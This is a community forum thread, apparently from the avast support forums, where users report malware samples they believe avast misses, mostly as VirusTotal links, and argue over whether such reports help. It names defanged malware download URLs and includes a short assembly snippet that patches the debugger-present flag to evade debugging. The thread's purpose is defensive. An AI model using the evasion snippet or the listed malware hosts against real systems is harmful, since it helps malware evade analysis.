So if you have sent to sample, then the post is pointless, even more so if you make the report in this topic then really you should follow it up and modify the post when the sample is detected. Otherwise it is just totally unbalanced only showing missed samples and no follow up to show the sample has been added to the virus definitions.
If you have sent the sample all of this additional stuff is moot, pointless, doesn't achieve anything.
-
I too think this topic isn't helpfull, I read from 1st page and saw Milos who said it was pointless so I have to agree ;)
Off course I send everything to them using email.
In Comodo's forum, there is a topic like that but that's not the same, you submit with VT links, they grab the SHA-1 values for each links and they locate them throught their cloud based DB.
But as you previously said, this topic should be closed.
-
Topics generally don't get closed unless they infringe general forum policy, which this doesn't.
But it really is pointless as every now and then I drop my little reminder. For any SHA-1 # to be collected it would require constant monitoring by someone in the virus labs and my guess they have better things to be getting on with.
-
What could be worth mentioning in this thread is malware that is so-called "long overdue" malware and has not been detected by avast for some time or detection was never added.
Long overdue is a particular malware that has been active for say 1200 hrs and over and for which many av solutions have detection and (only some and) avast has not.
Avast is known to have certain "blind spots", e.g. certain types of malware where it does not reach over average in detection percentages or even less (e.g. in the past certain banking trojans were missed).
Then another particular phenomenon is that for instance DrWeb's and avast detection overlap. I mean to say what avast detects DrWeb's does not and vice versa.
There are a couple of issues we have to consider.
A a large proportion of malcode is blocked and alerted by the avast shields.
Then there is malware that no longer exists and is still listed as active elsewhere, while the malware has been closed or isn't active any longer.
Another thing is checking av detection related to Intrusion Detection alerts (like URLquery gives) could add detections.
Then there is another issue that makes the use of this thread less reliable. That is that VT results do not measure up all of anti-malware detection, because it only gives part of the overall detection.
Another issie is with VirusWatch when we compare the percentage of av solutions' detection of a certain type of malware.
Again here we also have a good parameter to get certain patterns where a certain av solution is so-called "under par" considered to others.
It is a good thing that a lot of sites are not being visited because of Google Safebrowsing alerts in certain browsers.
Or users must ignore these alerts, which is a stupid thing to do.
Some users like Bitdefender's Trafficlight, Trustwave or WOT, and DrWeb's URLChecker to guide them through search engine results pages or Netrcraft's anti-phishing extension. So there are trafficlights: red, yellow and green to consider while surfing or clicking.
Extensions like NoScript and RequestPolicy are always a good option for further added overall in-browser protection if you know how to use and toggle these extension settings. And in certain cases it could be an option to run a browser in a sandbox...
polonus
-
In all honesty that to is pretty pointless, reporting here is going to do nothing, sample submission rules.
People posting here don't go back even a day to their previous reports to confirm they have been added to the virus definitions, what makes you think they are going to go back much further.
As I have said for so long this topic really is pointless when we can't/shouldn't attach samples, reports are not samples and samples sent directly to avast are king.
-
Hi DavidR,
I do go back to check on detection, hope others do likewise. But in case this will give negative results it should be reported somewhere, else no one or only the in-crowd would know clearly where we stand (detection level). Some like that all would go on "out of sight" and we will have so-called perfect "security through obscurity". I have always been against security through obscurity as far as where this is concerned.
Not everyone will visit e.g. VirusWatch clean mx and will look up a certain malware to see the overall detection range of various av solutions to know where "avast has dropped stitches in their knitting work". Positive criticism always helps a good product to even get better and that is and always has been the aim of this avast user...
polonus,
-
You are probably the exception to the rule, but even so it still doesn't get away from the point that posting here doesn't actually get anything done. Only sample submission does, so for me it is just wasted effort when there are other valuable things you could be doing with your time.
-
Hi DavidR,
Prior to reporting any missed detection here or in any other thread on the avast webforums I have reported to virus AT avast dot com when I thought that would help. This should be priority one.
I know these reports are/were helpful. I would encourage others to do likewise. We are with many here.
Sending samples will help, sending suspicious uri's will help.
Someone there should use the material towards better shield blocking, better script alerts, follow the IDS implementation consequences etc. etc.
I am certain that our efforts here has helped towards avast detection. The expertise achieved over time in website content analysis, potential suspicious script analysis, website software vulnerabilities and attack pattern awareness have helped avast detection.
Also know that malware removers in training are being sent here for instruction (also to for instance to !Donovan's site) and so the mutual efforts bring results,
polonus
-
I'm not talking about any other actions other than this topic.
The effort of posting here achieves nothing as has been confirmed by a member of the virus labs, the only thing that helps them is the receipt of samples. So those that are doing it have already played a part that this topic simply can't achieve.
What is done outside of this topic doesn't justify or sanction this topic as being useful to avast in getting 'samples' added to the definitions.
-
Hi true indian,
Found that here: 2012-12-26 [D] carlahahn dot de/jqYnYs8B.exe 1FE5C899B8DF52C198B1582CE15B30A4 39D96ED5A5DBFFF3A2EF5782851541356070AA8E 284672 82.165.87.2 M TE R MG UQ Data from VX Vault
DrWeb URL checker detects: Checking:htxp://carlahahn.de/jqYnYs8B.exe
Engine version:7.0.4.9250
Total virus-finding records:3513894
File size:277.50 KB
File MD5:4ff9db792185de2457cb3c6ddc91da53
htxp://carlahahn.de/jqYnYs8B.exe packed by FLY-CODE
>htxp://carlahahn.de/jqYnYs8B.exe probably infected with Trojan.Packed.196
polonus
Hi Pol,
Now Avast! Network shield is actively blocking this URL after I reported the URL and the sample 8)
-
Trojan
https://www.virustotal.com/file/8389e8a4f61c818f521bd4c214d989f84ff7d451905f030494539eaf73503f81/analysis/
Submitted from email.
Here we now have avast! network shield blocking the URL actively.
see: http://zulu.zscaler.com/submission/show/6cabbf804d61debf0e2ed900e3313dd1-1356754537
-
Nice thanks for sharing ;)
-
https://www.virustotal.com/file/e4ce09b9033f9b7d730739319b6519e17ad6c8c00aa16b352683603ee3b2d3df/analysis/1356774989/
https://www.virustotal.com/file/573861426c28f0cfcda20ffeca53741a929de8aaab32b22c65f715dc07fe78b9/analysis/1356775061/
https://www.virustotal.com/file/73dbe3b40ffe5dc90e7b868cb76c47b7a2d006c0122d3907bea219264e96ae5a/analysis/1356775070/
https://www.virustotal.com/file/f22fa0ee469eebb6d419670db69c9ee4bdd7c5be9df14bbfc7c8430a05905873/analysis/1356775073/
https://www.virustotal.com/file/98e65f3b1ca7d6c1e20584c615d6065562b9192785c7892f33cf52dcf249273c/analysis/1356775075/
https://www.virustotal.com/file/7323cb1b27fc132ab1eb5fefc50d80710d08caa3c6562159eae51800bf649ab6/analysis/1356775077/
and about 20 more i wont post here.
all sample sendt.
-
Hi Chabbo,
What I discussed on so-called "long overdue" does not concern riskware and particular adware as the avast PUP or riskware detection does not show in VT results generally. That is why I stated that VT results does not give a good picture of all that avast av detection covers (PUP-detection, avast various shields' detection, etc.). So VT results as a means is not the right tool to measure av detection and av detection patterns.
Then there is also the vulnerability window to be considered. At the beginning there is one, or there are two, three av solutions that detect, then others follow within a couple of hours to a couple of days for the av solutions that are slow to pick up. When 5 av solutions detect we speak of 100/100 % malware (zulu Zscaler)
Then we have malware that is being launched uniquely every time. There the launch sites or migration sites should be blocked period. Malware knows various ways to circumvent detection and that is an ongoing chess game between the good and the dark forces on the "Interwebs".
Furthermore we have potential suspicious files, detected by the fact that some script is running with anomalities together with IDS alerts other sources of malcreation can be determined and listed (Quttera's, wepawet, file viewers, urlquery etc.). Then there are blocklists where blocked ranges are only to be lifted if proven to be benign over some timespan (Google Safebrowsing for instance). Another factor is the possible insecurity of websites and how easily they could be (re-infected) (sucuri scans, safersite, dorks, vendor vulnerability lists) because server abuse through misconfiguration or outdated website software or bugs in the website software.
There we are running behind the facts always and all of the time because there is an enormous amount of unawareness from website owners/website admins and hoster staff even as how to protect the average user not to get infected by visiting their infestious websites. And then we have to add malware launching sites per se driven by cybercrime and co on bulletproof and FastFlux webservers with malware that is hard to close down. Here in browser added security through extensions like NoScript and RequestPolicy could protect the browser user to quite an extent.
So as the odds are against us, still with the right insight users can be online free of malware for years and years . To educate others how to achieve this is why we are here and do what we do,
polonus
-
Hi :)
Undetected malware.
https://www.virustotal.com/file/f6570c423a085618e86a753a068139f50df069ae9696902d2f9117000549fb2d/analysis/1356809075/
-
Trojan-Ransom.Win32.Blocker
https://www.virustotal.com/file/9da225cd393e132a152085e9ea9ca2a786240ab50115c9f22bdbffbe529edf72/analysis/1356932339/
reported to virus AT avast DOT com
-
Hi :)
Undetected malware.
https://www.virustotal.com/file/f6570c423a085618e86a753a068139f50df069ae9696902d2f9117000549fb2d/analysis/1356809075/
sample is 1 year old ;D
-
1 year old, still actual: http://www.backgroundtask.eu/Systeemtaken/taakinfo/186568/Main/rss.php
latest: https://www.virustotal.com/file/f6570c423a085618e86a753a068139f50df069ae9696902d2f9117000549fb2d/analysis/
Avast will detect this as a PUP...http://minotauranalysis.com/search.aspx?q=3c07d4db52e25e7fb66f7314650bfda7
NORTON BLOCKED IP 198.153.192.4
polonus
-
CVE-2012-4792
Avast detects this one: https://www.virustotal.com/file/c6586b543ca30894a36c43a3136943bfc3b29d200dded6867d59c3147ed92903/analysis/1357224525/
This one is missed:
https://www.virustotal.com/file/e2a61961f96ae2079d38d1c4cfb6703b28f233b2a25b20951376186b8c277e94/analysis/1357547939/
Reported to Virus AT Avast DOT com.
-
An analysis from exodusintel: http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/
and one from SpiderLabs Research here: http://blog.spiderlabs.com/2013/01/dissecting-a-cve-2012-4792-payload.html?utm_source=twitterfeed&utm_medium=twitter
@true indian,
Did you post this as well? http://forums.malwarebytes.org/index.php?showtopic=120412
while you have seen this? http://stopmalvertising.com/malware-reports/cve-2012-4792-analysis-of-today.swf.html (link author = Kimberley)
polonus
-
See: https://www.virustotal.com/url/668476583e5a22997785b10062b67051af81f6895ce5a5e28e3e9c989eab666d/analysis/
and
https://www.virustotal.com/file/3e2fa77239bfd02e2004ddea2917070e0ffb9cc55a2861f25191c3fe9b5c28ce/analysis/1357507441/
see: http://urlquery.net/report.php?id=624509
reported to virus AT avast dot com
polonus
-
Hi ;)
Undetected malware:
https://www.virustotal.com/file/20525159aaaefebe6231982a52b47d4ce19cd5d3a368d9d17effd7d89c86a73e/analysis/
-
See: https://www.virustotal.com/url/b8da28d174eaabcac70543da38099fe27c32cc678abd7a98ae1e2ffa3daaa74f/analysis/1357831007/
and https://www.virustotal.com/file/da47808b4dd41ea2df8d63f6d60f6a285e20c4f4e6d862a4d4bc7055363fd47f/analysis/1357831017/ nothing
>htxp://www.audiotoolsfactory.com/download/video-converter.exe/{sys}\ac3filter.ax - file too large, skipped
see: http://anubis.iseclab.org/?action=result&task_id=165fa6d9a424fc5844d6bd28fd2ca1d1a&format=html
polonus
-
See: http://zulu.zscaler.com/submission/show/cb9a276a923e2b8550287816eb2800ed-1357835602
Missed: https://www.virustotal.com/file/1e602851a1e5254ce345a4ad5dace9d0/analysis/
Reported to virus AT avast DOT com
-
Autorun Sample.
https://www.virustotal.com/file/3d98aeea05995d456de53bdcfd46a85347dc5e9c5f210a67177251f5803857aa/analysis/1358351427/
Reported to avast labs.
-
https://www.virustotal.com/en/file/6013992376f054510ed02d6fff88c32275e152b3d32da05a92d5574562055176/analysis/1362258046/ (https://www.virustotal.com/en/file/6013992376f054510ed02d6fff88c32275e152b3d32da05a92d5574562055176/analysis/1362258046/)
-
Why this thread is still open ? :o
I don't think any analyst come everyday to check here best thing that works well is e mail submission chest or support/report virus to virus lab (in V8).
-
https://www.virustotal.com/en/file/6013992376f054510ed02d6fff88c32275e152b3d32da05a92d5574562055176/analysis/1362258046/ (https://www.virustotal.com/en/file/6013992376f054510ed02d6fff88c32275e152b3d32da05a92d5574562055176/analysis/1362258046/)
Why would someone even think about downloading a .rar.zip when the installer can be downloaded from the official site? Makes no sense imo.
For those interested: http://www.jetbrains.com/phpstorm/
As for this topic, I'd assume it's useless. As shown in the above example, you would have no way of knowing where the user downloaded the offending content and rather it's legit or not. Such information can determine the difference between false positive and potential malware.
-
I have said for ages this topic is a waste of time.
Most people post, but don't follow up: A. avast need the sample sent directly and more so B. when the signature is added then the post should be modified to reflect that it is now included.
On point B seeing that in this topic is rarer than rocking horse droppings.
-
On point B seeing that in this topic is rarer than rocking horse droppings.
True and who is going to clean it up after rocking horse droppings ::).....................Not me I'm out and I would rather light a match ;D ;)
-
On point B seeing that in this topic is rarer than rocking horse droppings.
you can buy that ;) .... only 6.50 http://thebigrockinghorse.com.au/?p=1305
;D
-
I have said for ages this topic is a waste of time.
Most people post, but don't follow up: A. avast need the sample sent directly and more so B. when the signature is added then the post should be modified to reflect that it is now included.
On point B seeing that in this topic is rarer than rocking horse droppings.
No one is able to lock it ? ..
-
On point B seeing that in this topic is rarer than rocking horse droppings.
you can buy that ;) .... only 6.50 http://thebigrockinghorse.com.au/?p=1305
;D
ROFLMAO ;D ;D ;D ;D Looks Rock Solid there ;)
-
undetected malware
https://www.virustotal.com/sl/file/e302bfb198f7fcb761200a079d4e398674f5c1d5f0aeb8fd4ce1f1e7a17274de/analysis/1362406043/
-
undetected malware
https://www.virustotal.com/sl/file/e302bfb198f7fcb761200a079d4e398674f5c1d5f0aeb8fd4ce1f1e7a17274de/analysis/1362406043/
First seen by VirusTotal
2012-04-16 12:21:05 UTC (10 months, 3 weeks ago)
Yeah,Must be malware ;)
-
The filename rabr.exe was last seen on 3.4.2013, and it is considered as unsafe.
Threat name
Malware
Filename
[System32Root]\rabr.exe
Filesize
Unknown
Last seen
3.4.2013
Status
Known as unsafe.
This file can perform following behavior.
- File is created as process on the disk.
- This process can create, delete or modify files on the disk,
pol
-
https://www.virustotal.com/en/file/d9189fc6da7539be9f5c4768f902a4721473328b6fd470b0e68287f8a4e535d7/analysis/1368859977/
-
Hi mrapi,
Normally avast! should detect this as Win32:FakeAV-EAI.
Did you check for avast! shield detection?
It is a detection for a rogue/fake security tool (trojan)
polonus
-
Hi polonus,thanks for the answer,I couldn't find any setting for shield to add rogue/fake
That trojan should be detected by default,it acts as an antivirus and stops any application execution and asks for money to disinfect...
-
it is solved,thanks !
Hi polonus,thanks for the answer,I couldn't find any setting for shield to add rogue/fake
That trojan should be detected by default,it acts as an antivirus and stops any application execution and asks for money to disinfect...
-
Thanks for that feedback. I always enjoy we have added protection.
That is the main reason why I keep frequenting the avast webforums
well to aid/add to making avast! av even better than it already is...
polonus
-
you're welcome... :)
-
Chinese fake av not detected via VT file result scan: https://www.virustotal.com/nl/url/39a56bcdeaed17cf338f9ede28bd55e4809682bc1e5adf34e339873e19594a89/analysis/1369572621/
and
https://www.virustotal.com/nl/file/9b342ae7f25d65bdb817d8c995f3211ac398e41575fc5d149d994c1dcb008f0a/analysis/1365605849/
URL vip.dns-vip.net failed to be located in database...
What should be detected: http://urlquery.net/report.php?id=2637824
The recent detection pattern for the dropper: http://support.clean-mx.de/clean-mx/viruses.php?domain=dns-vip.net&sort=id%20DESC
Avast does not detect: https://www.virustotal.com/nl/file/a5eb9b868da9adebe0f23b0623f27072118431c315261bdd327ec1a6eee6364d/analysis/
The file being studied is a Portable Executable file! More specifically, it is a Win32 EXE file for the Windows GUI subsystem,
not necessarily malicious, may provide a threat!
polonus
-
What about this one: https://www.virustotal.com/nl/url/f94533b9150663a3727ff4c7101b47715f7c94ea31edc0eb1939b0dd2842996f/analysis/1369576163/
and https://www.virustotal.com/nl/file/d28a53b05b30ab450d856d85d1ba9bffc5f40ebdf899c8c31a074b372353f0a3/analysis/1369327457/
TR/Rogue.kdv.866075.20 not detected
Moreover hxtp://fsua-01.gamenet.ru/installers/qgna/bs/live/bs.exe is in Dr.Web malicious sites list!
polonus
-
This thing is all over our forum...JS autorun malware via USB.
https://www.virustotal.com/en/file/abb9839405654d2f44e85e4e36d6da429513a34322ce5b181807b30c56b96c73/analysis/
sent to avast.
-
How is detection for File names: - c3b5bc549e274296..., 3453e448961cf479..., be227e817c7ea7e1..., defa9f7681c9969a...,
Fingerprints: f252ef92144d60b4..., 2a3a8ea7b8d2d032..., a7d0a0fb7cc0e091..., d0dcb66b8217343d..., d291a94334e46a1c..., e8b1aef6eece8f85..., 5683c3a9f2529ece...
See: http://r.virscan.org/ca892b3b26798e0672cc8803c15808c8 & http://v.virscan.org/Trojan.JS.Autorun.A%20[Aquarius].html
polonus
-
https://www.virustotal.com/nl/file/dd07e26833431f5cb2ee4c43686fdea8651940d8b8c72d2728800b42619564d8/analysis/
for htXp://zozvupeb.ru/angrim2.exe -> http://urlquery.net/report.php?id=1525619
See: http://www.backgroundtask.eu/Systeemtaken/taakinfo/184509/angrim2.exe/
polonis
-
Why Not detected!? Win64/Olmarik.AW
https://www.virustotal.com/en/file/153b6508da404e0ef02bd0ef074f97607ffddabf4be90cfc4e9e308489c02034/analysis/
No shield detection...no nothing.
Reported to virus AT avast DOT com.
-
No Clue. https://www.virustotal.com/en/url/b858a9e79fc77d11ac2c6bde20f3030b159e86196cd8a4dcf795bbab90aeb480/analysis/1370881787/
HTML Document. Chrome blocks, Avast will not. There is said to be a file download, I didn't get it
-
See: http://www.malwaredomainlist.com/mdl.php?search=www.tdms.saglik.gov.tr
polonus
-
Yet another VBS autorun malware varient.
https://www.virustotal.com/en/file/005b007ed4b1f6f431e62d6035ce0080e08a958f45e9cc06fe7fa3ba4abe0f59/analysis/1370950728/
sent to avast. ;D
-
Someone is not following the threads here, see: http://forum.avast.com/index.php?topic=124252.0
Not so safe as was reported here: http://www.isthisfilesafe.com/sha1/F4991FB4740AB85B45EEBB5DD33D39DD88AAEB11_details.aspx
Side effects:
• Registry modification
Files It copies itself to the following location:
• %temp%\Updatea.vbs
Threat considered low damage, avast could detect this as PUP/riskware...
polonus
-
Good find Pol,show how fast these things spread :)
-
Again FUD autorun sample >:(
https://www.virustotal.com/en/file/3ff323e2bd69cab9f2a015f1df6402c96477c6591625bcb73c6defa597f0d6e7/analysis/1371289602/
https://www.virustotal.com/en/file/a293e9a0edb0c34de2b348ffa053a2ee4c965a5b678fd545a81ea16414494dc4/analysis/1371289603/
submitted to avast.
EDIT: WTF one of the sample is 4 days old and still FUD,no AV vendor see's it yet :o :o :o :o:
First submission 2013-06-11 08:24:31 UTC ( 4 days, 1 hour ago )
-
These samples were found here: http://forums.malwarebytes.org/index.php?showtopic=127787
and also sunmitted here: http://support.emsisoft.com/topic/11569-true-indians-submissions/
i04040.js for instance should be detected by avast as HTML:Iframe-MS [Trj]
polonus
-
Bad Boys gathered from USB
https://www.virustotal.com/en/file/c379ef4ffe8bd8abd5a3cb31a76c55de6946a1756a62d26398d27c3222f54e5b/analysis/1372086166/
https://www.virustotal.com/en/file/96b11e12f04062130ae4155d7dc6395735f61d829fa3b4eaf371af89e4acf944/analysis/1372086268/
https://www.virustotal.com/en/file/42257f704c68bb9bb4b10e3a670d859551d971c9addc1e126a8543daebcb5595/analysis/1372086319/
https://www.virustotal.com/en/file/c7bd252296272693d8ad658295de6ca89c6c0dd42c054ebb58f571aad1d8cc1f/analysis/1372086748/
Sent to avast and reported to MBAM.
-
There should be no distribution of samples via this forum, it is a support forum and not a quasi malware distribution service.
-
There should be no distribution of samples via this forum, it is a support forum and not a quasi malware distribution service.
Oops! many apologizes david..I have removed that from my reply I was only saying that because if anyone else wants to circulate the samples to some other AV vendors but I will take a note of that.
-
https://www.virustotal.com/de/file/55719cc99fcc00e38a00e67c1b34cc031f37dae73094b188627189559aca056f/analysis/
https://www.virustotal.com/de/file/a2c2339691fc48fbd14fb307292dff3e21222712d9240810742d7df0c6d74dfb/analysis/
https://www.virustotal.com/de/file/78c3b546d51b60c014764681feba004bee69c2bec1531667117adf2a823fd4d2/analysis/
https://www.virustotal.com/de/file/bab2f1e61b9dacabd4cb0e51238af7418a23499626a4ed005db7bd818fc00cf1/analysis/
https://www.virustotal.com/de/file/60c722ed7e6f15ad5bf55ca4a8f9c83e127001021fef93651c71e0dda84f270c/analysis/
https://www.virustotal.com/de/file/4a23542d116fc351f8016e5f24146c0256ffea910393f80ffac71e90b9d2152b/analysis/
https://www.virustotal.com/de/file/3c26ac826b462b67f7eb81dde234e74acbd59335512a1de038f49c10c1fa0668/analysis/
https://www.virustotal.com/de/file/a2c2339691fc48fbd14fb307292dff3e21222712d9240810742d7df0c6d74dfb/analysis/1373298617/
https://www.virustotal.com/de/file/1ab214bcb937d9baa981ccd9f9b13661c758ffe081b44b437db7aeb9fa7b3ca1/analysis/
-
https://www.virustotal.com/de/url/4dd7770bb0d2ba7d1a22ca558dc820389df49a2376a0f866f7322db0e1718390/analysis/
https://www.virustotal.com/de/file/0e0e477684bb8d0a6ada4b646c07d94e42046c0096c7b402c9eb3b1c3085d571/analysis/
https://www.virustotal.com/de/file/677933e1bb7d64297f03ce8b3118a11c261e6550532640b0cd708e3832a7a1e9/analysis/
https://www.virustotal.com/de/file/f3efcd13e0fdf8784296c77ba42889e01489f5329baf40a5a6fd163f2be09609/analysis/
https://www.virustotal.com/de/file/55719cc99fcc00e38a00e67c1b34cc031f37dae73094b188627189559aca056f/analysis/
https://www.virustotal.com/de/file/78c3b546d51b60c014764681feba004bee69c2bec1531667117adf2a823fd4d2/analysis/
https://www.virustotal.com/de/file/bab2f1e61b9dacabd4cb0e51238af7418a23499626a4ed005db7bd818fc00cf1/analysis/
https://www.virustotal.com/de/file/60c722ed7e6f15ad5bf55ca4a8f9c83e127001021fef93651c71e0dda84f270c/analysis/
https://www.virustotal.com/de/file/4a23542d116fc351f8016e5f24146c0256ffea910393f80ffac71e90b9d2152b/analysis/
https://www.virustotal.com/de/file/3c26ac826b462b67f7eb81dde234e74acbd59335512a1de038f49c10c1fa0668/analysis/
-
https://www.virustotal.com/de/file/83eac1bc7aa643e82215911f7fc5bbae1e9c0bf290d02f1ba2783c264891d60a/analysis/
https://www.virustotal.com/de/file/164864255d356996cd8111dd74b5b2733fa578a60081a433eb6ff8ee70315281/analysis/
https://www.virustotal.com/de/file/afaae780f6d98834728b31b799cf1f094c4429398a54702946d68ea7642aec98/analysis/
https://www.virustotal.com/de/file/22cd8de3dcba2fb38cd8b4a11c39c899f8ce5441f6020d7aff5c4e789b1b593a/analysis/
https://www.virustotal.com/de/file/41b87401075228c0d8129e3a8522f1ab6ca4fb592aacbff53c241a14cfafa7b4/analysis/
https://www.virustotal.com/de/file/a4661ed1dff681b214f04a22c57ef06bbe79ea57c51f10eaca61f9364e267559/analysis/
https://www.virustotal.com/de/file/893fcdfdc1797eaea7d56d92f98068b27d1b68f9eaadd17495118a4d7c6d4885/analysis/
https://www.virustotal.com/de/file/315f9a5fcd45dc3a3cad55d74e59a445b9758319bf286cb9ae9bb3cb1d56e15b/analysis/
https://www.virustotal.com/de/file/237bedfebbcce3d2751c49cf6cc6f879ce4a81ee34eaee74f053e3706a5ded68/analysis/
https://www.virustotal.com/de/file/393215b42032762ec30cfebf731fd7756fcd9c6535032ea5f78f0e9b74831805/analysis/
https://www.virustotal.com/de/file/0a18573765d6e32a12c070ea5fbfd09b848ad24281ff315450121dca274322dd/analysis/
https://www.virustotal.com/de/file/8b66cd525e28891f8d57bb1c7ea502c1f61e9d3dd9deb7045b744d9b41e460e5/analysis/
https://www.virustotal.com/de/file/f0f903dcbd8df45681478cf11b8a5ae405b9705350dc3b94130eccdb12e46216/analysis/
https://www.virustotal.com/de/file/de19110db290c4bcb94d0d9302a6c44c976bde1389c75cecd245363627e16123/analysis/
-
TheBeateMaker,Are you sending all samples to avast via virus@avast.com through e-mail,if not then posting links here will be of no use.
-
See for various posted there is avast detection now, e.g.
https://www.virustotal.com/de/file/164864255d356996cd8111dd74b5b2733fa578a60081a433eb6ff8ee70315281/analysis/
https://www.virustotal.com/de/file/83eac1bc7aa643e82215911f7fc5bbae1e9c0bf290d02f1ba2783c264891d60a/analysis/
polonus
-
https://www.virustotal.com/en/file/1a7f702a9b5a88d2f0e1047f4be6a37a52b8c3a95ab156db389e6a509c409277/analysis/1373544700/
PUP-File. deemed Safe by Essex
-
IDS flagged it here: http://urlquery.net/report.php?id=3533128
loaded will be kernel32.dll (where IsDebuggerPresent is located)
The circumvention is for a particular code example !
mov eax,dword ptr fs:[18]
mov eax,dword ptr ds:[EAX+30]
mov byte ptr ds:[eax+2],0
This will patch the IsPresent flag, ensuring IsDebuggerPresent always returns 0
(credits go to kuba on reverse engineering)
Adware - two detect in latest scan: https://www.virustotal.com/en/file/411240f7d25a1a63a68b0874eb8d122c3b2c2e0bddb94eee55818b6a535b6915/analysis/ (installer detection -> Global\Phoenix_Installer (failed) & RasPbFile (failed), this issue is a class of bug called a "Token Leak"....
polonus
-
https://www.virustotal.com/en/file/619531aa8bf0000586f23549475d523b36ac70a0f916ba17ddf9586137d532f4/analysis/1374143415/
Adware. It was "Supposed" to be a movie. I noticed the .exe part at the end. I figured it'd be malicous, thought I'd see what I could do to help. This seems like a good place.
-
https://www.virustotal.com/en/file/619531aa8bf0000586f23549475d523b36ac70a0f916ba17ddf9586137d532f4/analysis/1374143415/
Adware. It was "Supposed" to be a movie. I noticed the .exe part at the end. I figured it'd be malicous, thought I'd see what I could do to help. This seems like a good place.
send the file to virus@avast.com via mail,dont report it here it is not going to help avast in anyway :)
-
True Indian, I tried to do that. But gmail is being a * today and is saying it won't allow me. Virus obviously. Any other way? I've tried compressing it, renaming the Extension from .exe to .part.
Any help is awesome.
Thanks
Michael
-
True Indian, I tried to do that. But gmail is being a * today and is saying it won't allow me. Virus obviously. Any other way? I've tried compressing it, renaming the Extension from .exe to .part.
Any help is awesome.
Thanks
Michael
Hi Buddy,
You can simply archive your sample using 7-zip and password protect it.Password should be : infected
Be sure to mention the password in mail body and provide some additional info of the source of the sample eg: site address,IP,virustotal scan link etc
-
Will do. Thanks
-
Hello true indian and alan1998,
Good you two reported here.
It is the installer that is involved and that installer (wrapper) should be detected as junkware laden.
See the Sophos analysis here: http://www.sophos.com/en-us/threat-center/threat-analyses/adware-and-puas/InstallRex/detailed-analysis.aspx
This is something we see happening more and more and it is really frustrating for those users,
that download a legit program and are troubled by nasty and very hard to uninstall crap- and junkware.
CNet downloads also come with this uninvited junk installer for their downloads.
Just google this combination: installmate adware and you get many interesting info, my good friends,
dware InstallMate
SHA256: ecf7e1de8ef7a049a1abb3fb36e8b47786b7d96aa5123a4e86e2a3a44bbe11b0
SHA1: b87fe0346097f3b49b7fb01b85ef0004162bfc5a
MD5: 5192e5dcdbfc466042f55386a03f89a3
File size: 305456 bytes
Created files:
%WinDir%\TEMP\Tsu6193197D.dll – Adware InstallMate
%WinDir%\TEMP\{5CF5495C-FB77-790F-9BE4-B35587166BAA}\Setup.exe – Adware InstallMate
%WinDir%\TEMP\{5CF5495C-FB77-790F-9BE4-B35587166BAA}\_Setup.dll – Adware InstallMate
%WinDir%\TEMP\{5CF5495C-FB77-790F-9BE4-B35587166BAA}\_Setupx.dll – Adware InstallMate
polonus
-
Already submitted this file 2 times but it's not detected yet:
https://www.virustotal.com/pt/file/931d08a2c2ea526ac631a2d03fd8fb916d724b7e0e74bd6e82ef53ad6bb4074a/analysis/1374800638/
-
https://www.virustotal.com/en/file/2c6e6d0af78e09051b795e0d1cfba32d51d620a2731c9f48931a7e921fbbf002/analysis/1376371996/ (https://www.virustotal.com/en/file/2c6e6d0af78e09051b795e0d1cfba32d51d620a2731c9f48931a7e921fbbf002/analysis/1376371996/)
https://www.virustotal.com/en/file/d796dc13c8ec119d6f96c8b3b5f8af1012ad19a838ec3dbdd03603e06210ef28/analysis/1376372006/ (https://www.virustotal.com/en/file/d796dc13c8ec119d6f96c8b3b5f8af1012ad19a838ec3dbdd03603e06210ef28/analysis/1376372006/)
https://www.virustotal.com/en/file/7a9cc4cdcf4aa4c7c78c2ef47af3d5234597004a48b087feb3510bfebc4aeb83/analysis/1376374833/ (https://www.virustotal.com/en/file/7a9cc4cdcf4aa4c7c78c2ef47af3d5234597004a48b087feb3510bfebc4aeb83/analysis/1376374833/)
-
Hi Mrapi,
Thanks for helping in sending undetected samples to avast.Hopefully,you are submitting them to avast via e-mail or via avast virus chest. :)
-
Hi true indian,
This one reported above has some low detection rates: http://f.virscan.org/quarantine.zip.html
and just watch here: http://r.virscan.org/f06fbf6719e0f5909416043d64ecca56
polonus
-
I have no sample, a variant Trojan LNK not detected
https://www.virustotal.com/en/file/4148f39bc53f587b3777551c770fd2b372fa00414d3447b2854e623ef97b12c1/analysis/
-
https://www.virustotal.com/en/file/94c193fe61207b3fe74e313309cdf65884f61307011729a1c7d640d0c85de4d0/analysis/1399226305/
Sample emailed to AVAST
-
You will have noticed this topic hasn't been used for some time (13 August 2013, 15:22:44) as it is pointless - the only action worth anything is the submission to avast.
Avast can do nothing with a VT reference link, it needs only the sample.
-
kie Dokie